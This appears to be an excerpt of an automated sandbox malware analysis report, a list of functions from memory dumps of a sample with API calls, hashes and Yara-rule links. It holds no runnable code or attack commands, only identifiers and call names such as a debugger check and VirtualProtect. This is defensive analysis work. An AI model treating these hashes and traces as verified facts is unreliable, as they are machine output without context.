Instruction ID: c68e9f77534f7a5c8db23fdc95e4dccf2cf7698e697fc2b9e56e1484dee3d1ed
Opcode Fuzzy Hash: a2f1cdcc4eb44474d87e25d1ddbd9fbe6904175e83f51d318caab354fe27c6d3
Instruction Fuzzy Hash: 3121E4B5D00248DFDB10CFAAD984ADEFBF4EB48320F14841AE918A3350D374A954CFA0

Function 36CD5950 Relevance: 1.6, APIs: 1, Instructions: 62
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,36CD22A5,?,?,?), ref: 36CD59D5

Memory Dump Source

Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: 7e787c7ec60abe978f889d8f544c5cf60e6346dc8d4c72eb5bd1f0004868b5a1
Instruction ID: ebc90ed284392be6766cf12de7f0238a6aec66b11923d44692350adbe3ab9916
Opcode Fuzzy Hash: 7e787c7ec60abe978f889d8f544c5cf60e6346dc8d4c72eb5bd1f0004868b5a1
Instruction Fuzzy Hash: 5E2125B9D003099FCB10CF9AD884ADEBBB4FB88310F50851EE958A7200C375A945CFA1

Function 36CD1F9C Relevance: 1.6, APIs: 1, Instructions: 60
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,36CD22A5,?,?,?), ref: 36CD59D5

Memory Dump Source

Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: d62ab6f699541f82c85c42d0a345a005533318bda1a3ca7c58befe4393a1667b
Instruction ID: af4a58a78c227c94eb43e82131b5def56b317394ec65558b2b2033c383875f22
Opcode Fuzzy Hash: d62ab6f699541f82c85c42d0a345a005533318bda1a3ca7c58befe4393a1667b
Instruction Fuzzy Hash: EB2137B5D003499FCB10CF9AD884ADEFBF4FB88310F50851EE618A7201C374A945CBA0

Function 36CD55C8 Relevance: 1.6, APIs: 1, Instructions: 59
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumThreadWindows.USER32(?,00000000,?), ref: 36CD5639

Memory Dump Source

Source File: 00000015.00000002.2629987340.0000000036CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_36cd0000_rpkhzpuO.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 09a37f2d107ff714bb4fe9249b581f641dec66889286273e594c5da589f927b3
Instruction ID: cbccfe67c95ed5201818160ce4839b3ad61bb02f8a281dac0502d3ced6e4e56e
Opcode Fuzzy Hash: 09a37f2d107ff714bb4fe9249b581f641dec66889286273e594c5da589f927b3
Instruction Fuzzy Hash: 9A2115B1D002098FDB10DFAAC844BEEFBF4EB88320F54842AD514A3350D778A945CF64

Function 336B9130 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 336B91A4

Memory Dump Source

Source File: 00000015.00000002.2556555640.00000000336B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 336B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_336b0000_rpkhzpuO.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 2cea0c05cde0e5c6d76bccf3e819c67d076d73b768cf093de68d6c36460b41f9
Instruction ID: 3e2f3f56ec44d26654a6d7e2bfc72413fd05cc311d29ca90da1e263557a4173e
Opcode Fuzzy Hash: 2cea0c05cde0e5c6d76bccf3e819c67d076d73b768cf093de68d6c36460b41f9
Instruction Fuzzy Hash: DE1127B1D002099FDB10DFAAC884AAEFBF4AF48320F14841AD519A7240C7759900CFA0

Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80

SysAllocString.OLEAUT32 ref: 00401898

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Function 0040EA0A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

_doexit.LIBCMT ref: 0040EA16

Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189

Function 336B9308 Relevance: 1.3, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 336B936A

Memory Dump Source

Source File: 00000015.00000002.2556555640.00000000336B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 336B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_336b0000_rpkhzpuO.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e56c0239905fe3a803da855ab60c909ed04b0ac41d181295061ac1e543408cfc
Instruction ID: ad0dd860250fc12f86eaa204436558f77a1d40880a189858c734edf6b856f528
Opcode Fuzzy Hash: e56c0239905fe3a803da855ab60c909ed04b0ac41d181295061ac1e543408cfc
Instruction Fuzzy Hash: FD1136B1D003498FDB10DFAAD8457EEFBF4AF88620F24881AD519A7240C779A940CFA4

Function 31B9D6DC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2532294504.0000000031B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 31B9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_31b9d000_rpkhzpuO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a69779598dd5d31c02de8758c245efa7018d3a93f7e97b47dc1a661c99f7dbf8
Instruction ID: ba9c47a23c6ad4912a266fd6e087a535ed35b109258263c433333a2af750332f
Opcode Fuzzy Hash: a69779598dd5d31c02de8758c245efa7018d3a93f7e97b47dc1a661c99f7dbf8
Instruction Fuzzy Hash: 5321F875504384DFEB0ADF15DDC0B4ABF66FB88394F248679E9080B246C33AD457CAA2

Function 31B9D6D7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2532294504.0000000031B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 31B9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_31b9d000_rpkhzpuO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e19b8849574f69084d3a2b900cad5df28e11347f1f339390478c48b27048c21
Instruction ID: cdaae7ac9df7df961fc571100a092a5bd682a223cacb3810b7312aaa2827060b
Opcode Fuzzy Hash: 7e19b8849574f69084d3a2b900cad5df28e11347f1f339390478c48b27048c21
Instruction Fuzzy Hash: 8711D37A504284CFDB06DF10D9C0B4ABF72FB84314F24C6A9D8090B656C33AD45BCBA2

Function 31B9D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2532294504.0000000031B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 31B9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_31b9d000_rpkhzpuO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4972da9b77c53e865ccf3fc5a94e1f95fabc96a97de060335383ef3c962649b
Instruction ID: f9baf79c9d29070152db294ca55b983211c5094bc73c695e39924bfaf26cdfc4
Opcode Fuzzy Hash: a4972da9b77c53e865ccf3fc5a94e1f95fabc96a97de060335383ef3c962649b
Instruction Fuzzy Hash: 4D01F271504354EAF3158F26CD90B96BF98EF4A3E0F08862AED481B282C7799803C6B1

Function 31B9D006 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2532294504.0000000031B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 31B9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_31b9d000_rpkhzpuO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd83587e9620c8e3674c582e5520d00bd3de663c73df745340cdc0fc4f8de922
Instruction ID: 22677668e4dfeca81a1a7fb6a9f1825a930b8f2b1bcb52ab3c99f3aa6146c3b9
Opcode Fuzzy Hash: bd83587e9620c8e3674c582e5520d00bd3de663c73df745340cdc0fc4f8de922
Instruction Fuzzy Hash: B301927110E3C09FE3174B258CA4B52BFB4EF47264F0980DBD9888F293C2695845C772

Non-executed Functions

Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,338618E8), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Function 004017E0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON

Download Yara Rule

APIs

EntryPoint.RPKHZPUO(80070057), ref: 004017EE

Part of subcall function 00401030: RaiseException.KERNEL32(?,00000001,00000000,00000000,00000015,-30B19E70,2C2D8410), ref: 0040101C
Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030

EntryPoint.RPKHZPUO(80070057), ref: 00401800
EntryPoint.RPKHZPUO(80070057), ref: 00401813
__recalloc.LIBCMT ref: 00401828
EntryPoint.RPKHZPUO(8007000E), ref: 00401839
EntryPoint.RPKHZPUO(8007000E), ref: 00401853
_calloc.LIBCMT ref: 00401861

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
String ID:
API String ID: 1721462702-0
Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE

Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID:
API String ID: 2805327698-0
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(33861688), ref: 00414050

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

KERNEL32, xrefs: 00413610
IsProcessorFeaturePresent, xrefs: 0041361F

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMON

Download Yara Rule

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.2306714733.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000015.00000001.2306714733.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
